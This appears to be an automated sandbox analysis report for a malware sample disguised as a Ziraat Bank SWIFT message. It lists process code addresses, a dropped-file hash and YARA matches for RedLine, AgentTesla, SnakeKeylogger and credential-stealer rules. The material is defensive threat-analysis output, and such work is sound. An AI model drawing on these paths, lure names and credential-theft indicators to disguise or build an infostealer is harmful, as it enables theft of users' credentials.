Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 2_2_008F467F	2_2_008F467F
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 2_2_0092AACE	2_2_0092AACE
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 2_2_008DFA57	2_2_008DFA57
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 2_2_008F4BEF	2_2_008F4BEF
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 2_2_008D3B70	2_2_008D3B70
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 2_2_008E9ED0	2_2_008E9ED0
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 2_2_008DFE6F	2_2_008DFE6F
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 2_2_008C6F07	2_2_008C6F07
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 2_2_008CAF50	2_2_008CAF50
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 2_2_015D35E8	2_2_015D35E8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00408C60	5_2_00408C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0040DC11	5_2_0040DC11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00407C3F	5_2_00407C3F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00418CCC	5_2_00418CCC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00406CA0	5_2_00406CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_004028B0	5_2_004028B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_0041A4BE	5_2_0041A4BE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00418244	5_2_00418244
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00401650	5_2_00401650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00402F20	5_2_00402F20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_004193C4	5_2_004193C4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00418788	5_2_00418788
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00402F89	5_2_00402F89
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_00402B90	5_2_00402B90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_004073A0	5_2_004073A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_04BBD580	5_2_04BBD580
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_04B87F80	5_2_04B87F80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_04BB3780	5_2_04BB3780
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_04BBC7F0	5_2_04BBC7F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_04BC00D9	5_2_04BC00D9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_04BC39A3	5_2_04BC39A3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_04B86EAF	5_2_04B86EAF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_04BB5980	5_2_04BB5980
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_04B851EE	5_2_04B851EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_04B87B71	5_2_04B87B71
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_05B81030	5_2_05B81030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 5_2_05B81020	5_2_05B81020
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Code function: 11_2_00FD85C8	11_2_00FD85C8
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Code function: 12_2_0283C548	12_2_0283C548
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Code function: 12_2_02832DD1	12_2_02832DD1
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Code function: 12_2_02839888	12_2_02839888
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Code function: 12_2_0283C539	12_2_0283C539
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Code function: 12_2_0283965C	12_2_0283965C
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_04AB41C8	13_2_04AB41C8
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_04AB3E80	13_2_04AB3E80
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_04ABDF00	13_2_04ABDF00
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_04ABEA80	13_2_04ABEA80
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_04AB4A98	13_2_04AB4A98
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_04ABAA42	13_2_04ABAA42
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_04ABDF00	13_2_04ABDF00
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_061E7E78	13_2_061E7E78
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_061E56B8	13_2_061E56B8
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_061EC2A0	13_2_061EC2A0
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_061E66E8	13_2_061E66E8
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_061EB32A	13_2_061EB32A
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_061E3178	13_2_061E3178
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_061E2350	13_2_061E2350
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_061E7798	13_2_061E7798
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_061E0006	13_2_061E0006
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_061E0040	13_2_061E0040
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_061EE4C0	13_2_061EE4C0
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_061E5DDF	13_2_061E5DDF
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Code function: 13_2_061E0038	13_2_061E0038
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_0467B498	15_2_0467B498
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 15_2_0467B488	15_2_0467B488
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Code function: 20_2_0654DAAC	20_2_0654DAAC
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Code function: 20_2_06541B94	20_2_06541B94
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Code function: 20_2_0654E621	20_2_0654E621
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Code function: 20_2_0654255F	20_2_0654255F
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Code function: 20_2_065425B8	20_2_065425B8
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Code function: 20_2_065425A8	20_2_065425A8
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Code function: 20_2_06544174	20_2_06544174
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Code function: 20_2_06541D20	20_2_06541D20
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Code function: 20_2_065B3360	20_2_065B3360
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 26_2_016A9028	26_2_016A9028
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 26_2_016A5000	26_2_016A5000
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 29_2_00EAB338	29_2_00EAB338
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 31_2_011FF360	31_2_011FF360
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: 33_2_00D18628	33_2_00D18628
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 34_2_00408C60	34_2_00408C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 34_2_0040DC11	34_2_0040DC11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 34_2_00407C3F	34_2_00407C3F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 34_2_00418CCC	34_2_00418CCC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 34_2_00406CA0	34_2_00406CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 34_2_004028B0	34_2_004028B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 34_2_0041A4BE	34_2_0041A4BE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 34_2_00418244	34_2_00418244
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 34_2_00401650	34_2_00401650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 34_2_00402F20	34_2_00402F20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 34_2_004193C4	34_2_004193C4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 34_2_00418788	34_2_00418788
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 34_2_00402F89	34_2_00402F89
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 34_2_00402B90	34_2_00402B90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 34_2_004073A0	34_2_004073A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 34_2_04E8D580	34_2_04E8D580
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 34_2_04E8C7F0	34_2_04E8C7F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 34_2_04E57F80	34_2_04E57F80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 34_2_04E83780	34_2_04E83780
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 34_2_04E900D9	34_2_04E900D9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 34_2_04E551EE	34_2_04E551EE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 34_2_04E939A3	34_2_04E939A3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 34_2_04E85980	34_2_04E85980
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 34_2_04E56EAF	34_2_04E56EAF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 34_2_04E9515C	34_2_04E9515C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 34_2_04E57B71	34_2_04E57B71
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 34_2_05BD1030	34_2_05BD1030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 34_2_08474BC0	34_2_08474BC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 34_2_08474BB1	34_2_08474BB1

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\TrojanAI.exe 36FE89B3218D2D0BBF865967CDC01B9004E3BA13269909E3D24D7FF209F28FC5

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0040D606 appears 48 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0040E1D8 appears 86 times
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: String function: 008EF8A0 appears 31 times
Source: C:\Users\user\AppData\Local\bothsided\spadixes.exe	Code function: String function: 008E6AC0 appears 42 times
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: String function: 000A6AC0 appears 42 times
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe	Code function: String function: 000AF8A0 appears 31 times

Source: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 12.0.server02.exe.530000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.0.server02.exe.530000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 33.2.spadixes.exe.35a0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 5.2.svchost.exe.6f05570.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 2.2.spadixes.exe.3cc0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 5.2.svchost.exe.6f42790.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 34.2.svchost.exe.73bfdf0.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 34.2.svchost.exe.73bfdf0.6.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5.2.svchost.exe.70bfdf0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 5.2.svchost.exe.70bfdf0.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.svchost.exe.70bfdf0.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 5.2.svchost.exe.70bfdf0.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 5.2.svchost.exe.70bfdf0.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 5.2.svchost.exe.6f42790.6.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 13.0.neworigin.exe.2f0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 34.2.svchost.exe.73873c0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 26.2.spadixes.exe.3f20000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 31.2.spadixes.exe.39e0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 5.2.svchost.exe.6f05570.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 5.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 34.2.svchost.exe.73f8810.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 34.2.svchost.exe.73f8810.7.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 29.2.spadixes.exe.3680000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 34.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 34.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 5.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 5.2.svchost.exe.70f8810.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 5.2.svchost.exe.70f8810.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.svchost.exe.70f8810.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 5.2.svchost.exe.70f8810.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 5.2.svchost.exe.70f8810.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 5.2.svchost.exe.70873c0.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 5.2.svchost.exe.70873c0.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 5.2.svchost.exe.70873c0.8.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 5.2.svchost.exe.70873c0.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 5.2.svchost.exe.70873c0.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
Source: 00000002.00000002.1285293466.0000000003CC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000005.00000002.1295590843.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000001A.00000002.1427486186.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000C.00000000.1292636248.0000000000532000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
Source: 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000005.00000002.1302736160.000000000704E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AgentTeslaV2 author = ditekSHen, description = AgenetTesla Type 2 Keylogger payload
Source: 0000001D.00000002.1441006965.0000000003680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000022.00000002.1574359559.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000022.00000002.1580669736.000000000734E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000021.00000002.1489110172.00000000035A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000001F.00000002.1452830281.00000000039E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: Process Memory Space: svchost.exe PID: 5088, type: MEMORYSTR	Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
